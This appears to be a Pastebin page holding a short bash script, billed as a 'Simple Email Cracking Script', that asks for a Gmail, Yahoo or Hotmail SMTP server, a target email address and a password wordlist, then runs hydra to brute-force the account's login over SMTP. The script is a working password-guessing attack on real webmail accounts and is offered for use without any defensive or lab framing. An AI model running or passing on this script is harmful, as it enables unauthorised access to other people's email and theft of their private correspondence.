Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /bin/bash
- echo Simple Email Cracking Script in bash
- echo NOTE: Make sure you have wordlists!
- echo Let us Begin:
- echo Choose a SMTP service: Gmail = smtp.gmail.com / Yahoo = smtp.mail.yahoo.com / Hotmail = smtp.live.com /:
- read smtp
- echo Enter Email Address:
- read email
- echo Provide Directory of Wordlist for Passwords:
- read wordlist
- hydra -S -l $email -P $wordlist -e ns -V -s 465 $smtp smtp
- chmod a+x mail.sh
- ./mail.sh
Add Comment
Please, Sign In to add comment